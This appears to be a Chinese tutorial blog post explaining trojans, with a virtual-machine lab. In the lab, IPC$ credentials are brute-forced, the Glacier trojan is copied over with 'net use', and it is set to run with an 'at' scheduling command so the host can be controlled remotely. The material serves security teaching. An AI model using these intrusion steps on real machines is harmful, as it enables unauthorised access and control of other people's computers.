网络安全基础
一、木马
1. 概述
木马通常成为黑客程序,恶意代码,也称特洛伊木马,是一个基于远程控制的黑客工具,木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。
2. 特性
- 隐蔽性
将自己伪装成合法应用程序,使得用户难以识别,这是木马病毒的首要也是重要的特征。 - 潜伏性
木马病毒隐蔽的主要手段是欺骗,经常使用伪装的手段将自己合法化。例如,使用合法的文件类型后缀名“dll、sys,ini’'等;使用已有的合法系统文件名,然后保存在其它文件目录中;使用容易混淆的字符进行命名,例如字母“o”与数字“0”,数字“1”与字母“i”。 - 再生性
木马病毒为了保障自己可以不断蔓延,往往像毒瘤一样驻留在被感染的计算机中,有多份备份文件存在,一旦主文件被删除,便可以马上恢复。尤其是采用文件的关联技术,只要被关联的程序被执行,木马病毒便被执行,并生产新的木马程序,甚至变种。顽固的木马病毒给木马清除带来巨大的困难。
3. 组成
完整的木马程序一般由两部分组成:一个是服务器端,一个是控制器端。
控制端:安装在攻击者的控制台,负责远程遥控指挥;
服务器端:即木马程序,隐蔽的安装在被攻击者的主机上,目标主机也称为肉鸡。
4. 危害
- 盗取用户信息
- 传播病毒:利用你去攻击别人
- 占用系统资源,降低电脑性能等
5. 传播途径
- 利用浏览器漏洞或浏览器插件漏洞;
- 通过QQ、MSN等通讯软件,发送恶意网址链接或木马病毒文件;
- 使用U盘等移动存储介质;
- 陌生的邮件;
- 伪装成多媒体影音文件;
- 操作系统漏洞或弱口令远程植入;
- 下载来源不明的程序
6. 模拟实验
-
使用两台虚拟机,一台模拟攻击者,一台模拟被种植木马的受害者,然后使用木马程序(冰河木马、灰鸽子等)控制受害者主机。
-
冰河木马:G_Client.exe、G_Server.exe。
G_Client.exe是监控端执行程序,可以用于监控远程计算机和配置服务器;
G_Server.exe是被监控端后台监控程序(运行一次即自动安装,开机自启动,可任意改名,运行时无任何提示);
运行G_Server.exe后,该服务端程序直接进入内存,并把感染机的7626端口开放,使用冰河客户端软件(G_Client.exe)的计算机可以对感染机进行远程控制。
- 使用Dos命令远程连接目标主机。
它会让你输入用户名和密码:
net use \\目标主机IP地址\ipc$
密码或用户在 \\目标主机IP地址\ipc$ 无效
为 '目标主机IP地址' 输入用户名:
输入 目标主机IP地址 的密码:
只能使用密码字典生成工具和暴力破解软件进行暴力破解:
成功破解后,再使用dos命令远程连接目标主机:
net use \\目标主机IP地址\ipc$ 密码 /user:用户名
- 成功连接后,将冰河木马文件拷贝至目标主机,并使用dos命令根据时间设置启动事件:
# 查看目标主机时间
net time \\目标主机IP地址
# 添加执行程序
at \\目标主机IP地址 设定时间 目标主机木马程序的路径
如:at \\10.1.1.2 09:00 c:\binghe.exe,上午9点执行c盘下的木马病毒程序
- 再次使用G_Client.exe搜索主机
安装了冰河木马的计算机的IP地址前就会变成了OK:
- 使用冰河木马对目标主机进行控制
可以对目标主机进行各种控制和监控,甚至还可以和目标主机进行交互!
4万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
